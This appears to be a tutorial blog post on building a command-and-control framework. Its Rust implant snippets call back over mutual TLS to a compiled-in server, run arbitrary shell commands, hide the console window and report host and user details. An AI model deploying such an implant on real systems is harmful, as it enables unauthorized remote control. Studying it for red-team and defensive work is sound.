
Introduction
Command and Control (C2) frameworks are the backbone of red team operations. They allow operators to manage compromised machines, execute commands remotely, exfiltrate data, and maintain persistence. While mature C2 frameworks like Cobalt Strike, Sliver, and Mythic exist, building one from scratch is one of the best ways to deeply understand offensive security tooling, network programming, and the cat-and-mouse game between attackers and defenders.
In this two-part series, we walk through the design and implementation of Avocado C2, an open-source C2 framework with a Rust-based implant, a Python server, and both CLI and GUI operators. This first post covers the foundational architecture, including how the components communicate, the way we secured the channel with mutual TLS, how Protocol Buffers define our wire format, and how the Rust implant works from the inside out.
High-Level Architecture
Avocado consists of three core components.
| Component | Language | Role |
|---|---|---|
| Server | Python | Accepts implant connections (mTLS), accepts operator connections, and routes commands between operators and implants |
| Implant | Rust | Runs on the target machine, connects back to the server over mTLS, executes commands, and reports system info |
| Operator | Python (CLI + PyQt6 GUI) | The red teamer's interface for listing sessions, sending commands, and generating new implants |
The data flow looks like this:
Operator  <-- TCP -->  Server  <-- mTLS -->  Implant
(CLI/GUI)   :31338    (Python)    :31337     (Rust)
The server acts as a broker. Operators connect over a plain TCP socket on port 31338 and issue commands. The server relays those commands to the appropriate implant over a mutual TLS connection on port 31337, then sends the output back to the operator.
We chose two separate protocols for specific reasons. The operator is a trusted party running on the red teamer's own machine, so we do not need the overhead of mTLS there. However, the implant-to-server channel traverses hostile networks and requires the full cryptographic treatment.
Defining the Wire Format with Protocol Buffers
Before writing any networking code, we need to agree on how data is structured on the wire. We use Protocol Buffers (protobuf) for this task because they are compact, fast to serialize and deserialize, and generate code for both Rust and Python.
The Implant Protocol
The implant protocol (implantpb.proto) defines all messages exchanged between the implant and the server.
syntax = "proto3";

package implantpb;

message Message {
  enum MessageType {
    Error = 0;
    Registration = 1;
    RegistrationConfirmation = 2;
    OsCmd = 3;
    OsCmdOutput = 4;
    FileXfer = 5;
    FilePacket = 6;
  }
  MessageType message_type = 1;
  bytes data = 2;
}
There is an important design decision here. The protobuf wire format is not self-describing: Python's implementation will happily deserialize a byte stream as the wrong message type without raising an error, and it silently ignores fields it does not recognize. Send a Registration message, decode it as an OsCmd, and Python will not complain; it will simply hand you empty fields.
To work around this, every message is wrapped in a Message envelope that carries a MessageType discriminator. The receiver checks the type first and then deserializes the inner data bytes into the correct protobuf type. This is essentially a simplified version of a tagged union for protobuf.
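As an illustration of that dispatch, here is the receiving side sketched in plain Python. The dicts and decoder functions are stand-ins of mine for the generated protobuf classes, not Avocado's actual code:

```python
# Envelope dispatch sketch: check the MessageType tag first, then decode
# the payload with the matching decoder. Names here are illustrative.
OS_CMD = 3  # mirrors MessageType.OsCmd in implantpb.proto

def decode_os_cmd(data: bytes) -> dict:
    # Stand-in for decoding with the generated OsCmd class
    return {"cmd": data.decode()}

DECODERS = {
    OS_CMD: decode_os_cmd,
    # ... one entry per MessageType variant
}

def handle_envelope(envelope: dict):
    # Consult the discriminator *before* touching the payload bytes
    decoder = DECODERS.get(envelope["message_type"])
    if decoder is None:
        raise ValueError(f"unexpected message type: {envelope['message_type']}")
    return decoder(envelope["data"])
```

Because the discriminator is consulted before any payload parsing, bytes are only ever decoded by the type that produced them, and unknown tags fail loudly instead of yielding empty messages.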
These are the key message types.
// System information sent when an implant first connects
message Registration {
  string addr = 1;
  string os = 2;
  uint32 pid = 3;
  message User {
    uint32 id = 1;
    string name = 2;
  }
  User user = 4;
  repeated User groups = 5;
}

// Server confirms the registration and assigns an ID
message RegistrationConfirmation {
  string id = 1;
}

// A command to execute on the target
message OsCmd {
  string cmd = 1;
}

// The result of an executed command
message OsCmdOutput {
  oneof status {
    int32 code = 1;
  }
  bytes stdout = 2;
  bytes stderr = 3;
}
The Operator Protocol
The operator protocol (operatorpb.proto) is separate. Operators do not talk directly to implants. Instead, they talk to the server, which translates between the two protocols.
syntax = "proto3";

package operatorpb;

message Message {
  enum MessageType {
    SessionCmd = 0;
    SessionCmdOutput = 1;
    SessionInfo = 2;
  }
  MessageType message_type = 1;
  bytes data = 2;
}

message SessionCmd {
  string cmd = 1;
  string id = 2;
}

message SessionCmdOutput {
  string cmdOutput = 1;
  string id = 2;
}

message SessionInfo {
  string id = 1;
  string addr = 2;
  string os = 3;
  uint32 pid = 4;
  message User {
    uint32 id = 1;
    string name = 2;
  }
  User user = 5;
  repeated User groups = 6;
}
The SessionCmd includes an id field, which is the session UUID assigned when the implant registered. This allows the operator to target a specific implant when multiple are connected.
Compiling Protobufs for Rust
On the Rust side, we use prost-build to compile .proto files at build time. The build.rs script is quite small.
fn main() {
    prost_build::compile_protos(&["src/implantpb.proto"], &["src/"]).unwrap();
}
This generates Rust structs and serialization code automatically. In Cargo.toml, we include the build dependency.
[build-dependencies]
prost-build = "0.11.8"

[dependencies]
prost = "0.11.8"
Mutual TLS: Securing the Implant Channel
The implant-to-server connection uses mutual TLS (mTLS). In regular TLS, only the server proves its identity. In mTLS, both sides present certificates. This ensures that the implant verifies it is talking to the real C2 server rather than a honeypot, and the server verifies the implant has a certificate signed by our own CA.
Generating Certificates in Pure Python
Early versions of Avocado relied on mkcert, an external tool. This caused issues with different OS environments, missing binaries, and Docker path headaches. We replaced it with a pure Python implementation using the cryptography library.
The cert_generator class handles the entire PKI.
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
import datetime, os

class cert_generator(object):
    def __init__(self, name: str, client: bool):
        self.name = name
        self.key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
        )
        self.cert_dir = os.path.join(AVOCADO_ROOT, "certs", self.name)
        if client == False:
            # Server mode: generating a new CA
            self.CA, self.CA_Key, self.CA_Path = self.generate_CA()
        else:
            # Client mode: loading the existing CA to sign the implant cert
            self.CA, self.CA_Key, self.CA_Path = self.load_CA('root')
When the server starts, it creates a new Root CA and generates a server certificate signed by that CA. When an implant is generated, the operator creates a new client certificate signed by the same Root CA and embeds it into the implant binary.
Here is the CA generation.
def generate_CA(self):
    one_day = datetime.timedelta(1, 0, 0)
    private_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
    )
    builder = x509.CertificateBuilder()
    builder = builder.subject_name(x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, u'root'),
    ]))
    builder = builder.issuer_name(x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, u'root'),
    ]))
    builder = builder.not_valid_before(datetime.datetime.today() - one_day)
    builder = builder.not_valid_after(datetime.datetime.today() + (one_day * 30))
    builder = builder.serial_number(x509.random_serial_number())
    builder = builder.public_key(private_key.public_key())
    builder = builder.add_extension(
        x509.BasicConstraints(ca=True, path_length=None), critical=True,
    )
    certificate = builder.sign(
        private_key=private_key, algorithm=hashes.SHA256(),
    )
    # Save to disk... (rootCA_cert is the on-disk path written here)
    return certificate, private_key, rootCA_cert
The client and server certificate generation follows a similar pattern, where each is signed by the CA. The critical detail is that the certificate is signed by self.CA_Key, which is the CA's private key, rather than the certificate's own key. This is what makes the chain of trust work. Since both the server and implant certificates are signed by the same root CA, each side can verify the other.
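To make that signing relationship concrete, here is a minimal, self-contained sketch using the same cryptography library. The helper names (make_key, make_cert) are mine, not Avocado's; the point is that the leaf certificate carries its own public key but is signed with the CA's private key:

```python
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

def make_key():
    return rsa.generate_private_key(public_exponent=65537, key_size=2048)

def make_cert(subject_cn, issuer_cn, public_key, signing_key, ca):
    # The cert embeds `public_key`, but its *signature* comes from `signing_key`
    now = datetime.datetime.utcnow()
    builder = (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, subject_cn)]))
        .issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, issuer_cn)]))
        .public_key(public_key)
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=30))
        .add_extension(x509.BasicConstraints(ca=ca, path_length=None), critical=True)
    )
    return builder.sign(private_key=signing_key, algorithm=hashes.SHA256())

ca_key = make_key()
ca_cert = make_cert("root", "root", ca_key.public_key(), ca_key, ca=True)  # self-signed

leaf_key = make_key()
# Signed with ca_key, NOT leaf_key -- this is the chain of trust
leaf_cert = make_cert("implant", "root", leaf_key.public_key(), ca_key, ca=False)

# Anyone holding the CA cert can check the leaf's signature:
ca_cert.public_key().verify(
    leaf_cert.signature,
    leaf_cert.tbs_certificate_bytes,
    padding.PKCS1v15(),
    leaf_cert.signature_hash_algorithm,
)
```

The final verify() call is essentially the check each TLS peer performs during the mTLS handshake; it raises InvalidSignature if the leaf was not signed by this CA.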
Server-Side mTLS in Python
The server's Listener class sets up mTLS using Python's ssl module.
class Listener:
    def __init__(self, requestq: Queue, endpoint: Tuple[str, int]):
        self.host, self.port = endpoint
        self.sessions = Sessions()
        # Generate CA + server certs on startup
        self.Server_Certificate_Generator = cert_generator('server', client=False)
        self.server_cert, self.server_key = self.Server_Certificate_Generator.build_x509_cert()
        ctx = self._mtls_cfg()
        self.ssock = self._mkssock(ctx)
        t = threading.Thread(target=self._accept, args=(requestq,), daemon=True)
        t.start()

    def _mtls_cfg(self) -> ssl.SSLContext:
        ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ctx.verify_mode = ssl.CERT_REQUIRED  # This enables mutual authentication
        ctx.load_cert_chain(certfile=self.server_cert, keyfile=self.server_key)
        ctx.load_verify_locations(cafile=self.Server_Certificate_Generator.CA_Path)
        return ctx
The key line is ctx.verify_mode = ssl.CERT_REQUIRED. Without it, you would have regular TLS where only the server authenticates. With it, the server demands that the client present a valid certificate signed by the same CA.
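You can see this default for yourself; the tiny snippet below (mine, not from Avocado) shows that a fresh server-side context starts out as plain TLS until you flip the switch:

```python
import ssl

# Server-side contexts do not request a client certificate by default
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
print(ctx.verify_mode)  # CERT_NONE: plain TLS, client stays anonymous

ctx.verify_mode = ssl.CERT_REQUIRED
# From here on, the handshake fails unless the client presents a certificate
# that chains to a CA loaded via load_verify_locations().
```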
Client-Side mTLS in Rust
On the implant side, we use rustls for TLS. The configuration loads certificates that were embedded at compile time.
pub fn client_config(
    root_ca: &str,
    client_pem: &str,
    client_key: &str,
) -> Result<rustls::ClientConfig> {
    let root_store = load_root_store(root_ca)?;
    let client_pem = load_pem(client_pem)?;
    let client_key = load_key(client_key)?;

    let mut config = rustls::ClientConfig::builder()
        .with_safe_defaults()
        .with_root_certificates(root_store)         // Verify the server's cert
        .with_single_cert(client_pem, client_key)?; // Present our own cert

    config.alpn_protocols = vec!["PostHandshakeAuth".as_bytes().to_vec()];
    Ok(config)
}
The certificates are not loaded from disk at runtime. Instead, they are compiled into the binary using rust-embed. This is important for OPSEC, as the implant binary is a single, self-contained executable with no external dependencies or config files. Everything is baked in at compile time.
The Rust Implant: Deep Dive
Why Rust?
There are several reasons to write the implant in Rust rather than Python or C.
- Static binaries: Using musl, we can compile to a fully static binary with zero runtime dependencies. You can drop it on any Linux box and it will run.
- Cross-compilation: We can compile for Linux and Windows from the same build environment.
- Small binaries: With the right profile settings, the implant is quite small.
- Memory safety: Rust prevents buffer overflows, use-after-free, and null pointer dereferences by design, which are common vulnerabilities in C implants.
- No runtime: Unlike Go, there is no garbage collector or large runtime to inflate the binary size.
The release profile in Cargo.toml is tuned for minimal binary size, while the static C runtime is forced through rustflags in .cargo/config.toml (Cargo ignores rustflags placed in Cargo.toml itself).

# Cargo.toml
[profile.release]
strip = true        # Strip debug symbols
opt-level = "z"     # Optimize for size, not speed
lto = true          # Link-time optimization
codegen-units = 1   # Single codegen unit for better optimization
panic = "abort"     # Don't include unwinding code

# .cargo/config.toml
[target.x86_64-unknown-linux-musl]
rustflags = ["-C", "target-feature=+crt-static"]

[target.x86_64-pc-windows-gnu]
rustflags = ["-C", "target-feature=+crt-static"]
The Main Loop
The implant's main() function is remarkably clean considering how much it handles.
#![windows_subsystem = "windows"] // Don't flash a console window on Windows

fn main() {
    // Configure mutual TLS with embedded certificates
    let config = mtls::client_config(
        embed::SERVER_ROOTCA,
        embed::IMPLANT_PUBLIC_KEY,
        embed::IMPLANT_PRIVATE_KEY,
    ).unwrap();

    // Point to the C2 server (address baked in at compile time)
    let addr = embed::SERVER_ENDPOINT.parse().unwrap();
    let server = mtls::Server::new(addr, embed::SERVER_NAME).unwrap();

    // Create two channels for bidirectional communication
    let (read_tx, read_rx) = mpsc::channel();
    let (write_tx, write_rx) = mpsc::channel();

    // Start the mTLS session in a separate thread
    let mut client = mtls::Client::new(config, server).unwrap();
    let session_thread = thread::spawn(move || {
        client.session(write_rx, read_tx);
    });

    // Start processing messages from the server
    handler::Handler::new(read_rx, write_tx).start();
    session_thread.join().unwrap();
}
The architecture uses channels (mpsc::channel) to decouple the TLS network thread from the message handler thread. The TLS thread reads encrypted bytes and decodes them into protobuf Message objects, which it sends to the handler via a channel. The handler processes the message and sends a response back through another channel for transmission.
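The same decoupling can be sketched in a few lines of Python, using queue.Queue in place of Rust's mpsc channels (the message dicts and names here are illustrative, not Avocado's):

```python
import queue
import threading

# read_q: network thread -> handler; write_q: handler -> network thread
read_q = queue.Queue()
write_q = queue.Queue()

def handler_loop():
    # Mirrors Handler::start(): consume decoded messages, emit responses
    while True:
        message = read_q.get()
        if message is None:  # shutdown sentinel for the demo
            break
        write_q.put({"type": "OsCmdOutput", "stdout": message["cmd"].encode()})

t = threading.Thread(target=handler_loop, daemon=True)
t.start()

# The "network thread" side: push a decoded command, collect the response
read_q.put({"type": "OsCmd", "cmd": "id"})
response = write_q.get(timeout=5)

read_q.put(None)
t.join()
```

Neither thread ever blocks on the other's internals: the network side only moves decoded messages in and responses out, while the handler stays oblivious to TLS.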
The Non-Blocking TLS Client
The TLS client uses mio for non-blocking I/O. This is critical because we need to simultaneously read from the server to receive commands and write to the server to send results. A blocking approach could deadlock: a blocked read would stop the implant from flushing queued command output, while a blocked write would stop it from noticing incoming commands.
pub fn session(&mut self, rx: mpsc::Receiver<pb::Message>, tx: mpsc::Sender<pb::Message>) {
    let mut events = mio::Events::with_capacity(128);
    let mut poll = mio::Poll::new().unwrap();
    poll.registry().register(
        &mut self.sock, CLIENT,
        Interest::READABLE | Interest::WRITABLE,
    ).unwrap();

    loop {
        poll.poll(&mut events, None).unwrap();
        for event in events.iter() {
            if event.is_readable() {
                // Read data from the server
                self.conn.read_tls(&mut self.sock).unwrap();
                let io_state = self.conn.process_new_packets().unwrap();
                if io_state.plaintext_bytes_to_read() > 0 {
                    let buf = self.read().unwrap();
                    let message = pb::Message::decode(buf.as_slice()).unwrap();
                    tx.send(message).unwrap();
                }
                if io_state.peer_has_closed() {
                    return;
                }
            }
            if event.is_writable() {
                self.conn.write_tls(&mut self.sock).unwrap();
                if let Ok(message) = rx.recv_timeout(CHANNEL_TIMEOUT) {
                    self.write(message.encode_to_vec()).unwrap();
                }
            }
        }
    }
}
The mio event loop polls the socket for events. When data arrives, it decrypts the TLS layer, decodes the protobuf message, and forwards it through the channel. When the socket is writable, it checks if there is a pending response to send.
The Message Handler
The handler is a state machine with two states, Unregistered and Registered.
enum Status {
    Unregistered,
    Registered(String),
}

impl Handler {
    pub fn start(&mut self) {
        // First, send a registration message
        self.tx.send(self.register()).unwrap();

        while let Ok(message) = self.rx.recv() {
            match &self.status {
                Status::Unregistered => {
                    self.handle_confirmation(message);
                }
                Status::Registered(_id) => {
                    let message = self.handle_message_authed(message);
                    self.tx.send(message).unwrap();
                }
            }
        }
    }
}
When the implant first connects, it sends a Registration message with system information and waits for a confirmation. Once confirmed, it enters the Registered state and starts processing commands.
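Stripped of the Rust specifics, the state machine amounts to the following (a Python sketch of mine with dict stand-ins for the protobuf messages, not the actual implant code):

```python
class ImplantHandler:
    """Two-state sketch: Unregistered (session_id is None) vs Registered."""

    def __init__(self):
        self.session_id = None

    def handle(self, message):
        if self.session_id is None:
            # Unregistered: only a confirmation moves us forward
            if message["type"] == "RegistrationConfirmation":
                self.session_id = message["id"]
            return None
        # Registered: commands get processed and answered
        if message["type"] == "OsCmd":
            return {"type": "OsCmdOutput", "stdout": b"", "stderr": b""}
        return {"type": "Error"}
```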
Gathering System Information
The tasks::register() function collects information about the target machine.
pub fn register() -> Result<Registration> {
    let info = super::info::Info::new();
    Ok(Registration {
        addr: "".to_string(),     // The server determines the IP
        os: info.os()?,           // e.g., "Ubuntu 22.04.1 LTS"
        pid: info.pid()?,         // Process ID of the implant
        user: Some(info.user()?), // Username and UID
        groups: info.groups()?,   // Group memberships
    })
}
The Info struct uses the sysinfo and whoami crates to gather this data. The IP address is determined by the server from the socket connection rather than being self-reported by the implant, which is more reliable since the implant might be behind NAT.
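The server-side half of that decision is simply the peer address that accept() returns; a self-contained loopback sketch:

```python
import socket

# The server learns the peer address from the TCP connection itself,
# so the implant never has to self-report a possibly NAT-obscured address.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))   # ephemeral port for the demo
srv.listen(1)

cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cli.connect(srv.getsockname())

conn, addr = srv.accept()    # addr = (peer_ip, peer_port) as the server sees it
print(addr[0])               # "127.0.0.1" in this loopback demo

conn.close(); cli.close(); srv.close()
```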
Command Execution
When the handler receives an OsCmd message, it executes the command using platform-specific code.
#[cfg(target_os = "linux")]
pub fn exec(cmd: &str) -> anyhow::Result<Output> {
    let cmd = cmd.trim_matches(char::from(0));
    let output = Command::new("/bin/bash").args(["-c", cmd]).output()?;
    Ok(output)
}

#[cfg(target_os = "windows")]
pub fn exec(cmd: &str) -> anyhow::Result<Output> {
    let cmd = cmd.trim_matches(char::from(0));
    let output = Command::new("cmd").args(["/C", cmd]).output()?;
    Ok(output)
}
The #[cfg(target_os = "...")] attributes ensure that only the relevant platform's code is included in the final binary. On Linux, commands run through /bin/bash -c, while on Windows, they run through cmd /C. The trim_matches(char::from(0)) call strips any null bytes that might sneak in from protobuf padding.
The result is wrapped back into a protobuf response. Error handling uses Rust's Result type, so if a command fails, we send back an Error protobuf with the details rather than crashing the implant.
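For comparison, here is the same dispatch sketched in Python (my code, not Avocado's: platform.system() stands in for Rust's cfg attributes, and it assumes /bin/bash exists on non-Windows hosts):

```python
import platform
import subprocess

def exec_cmd(cmd: str) -> subprocess.CompletedProcess:
    # Mirror trim_matches(char::from(0)): drop stray NUL bytes from the wire
    cmd = cmd.strip("\x00")
    if platform.system() == "Windows":
        argv = ["cmd", "/C", cmd]
    else:
        argv = ["/bin/bash", "-c", cmd]
    # capture_output collects stdout/stderr, like Rust's Output struct
    return subprocess.run(argv, capture_output=True)

result = exec_cmd("echo hello\x00")
```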
Session Management
On the server side, sessions are tracked in a thread-safe dictionary.
class Sessions:
    def __init__(self):
        self._mutex = threading.Lock()
        self._sessions = dict()

    def add(self, conn, addr) -> str:
        with self._mutex:  # released even if an exception is raised
            id = str(uuid.uuid4())
            self._sessions[id] = (conn, addr)
            return id

    def get(self, id):
        with self._mutex:
            return self._sessions[id]
Each implant gets a UUID assigned at registration. When an operator wants to interact with a specific implant, they reference it by this UUID. The server looks up the corresponding SSL socket and forwards commands to it.
What We've Built So Far
At this point, we have a working foundation.
- A protobuf-based wire protocol with type safety.
- Mutual TLS authentication between the implant and the server.
- A Rust implant that registers, gathers system info, and executes commands.
- Cross-platform support for Linux and Windows using conditional compilation.
- Session management with UUID-based addressing.

In Part 2, we will build the server's command routing, the operator interfaces for both CLI and GUI, the implant generation pipeline, and the Docker-based deployment system that ties everything together.
Avocado C2 is an open-source project by PlatformSecurity. This post is for educational purposes, and you should always obtain proper authorization before using offensive security tools.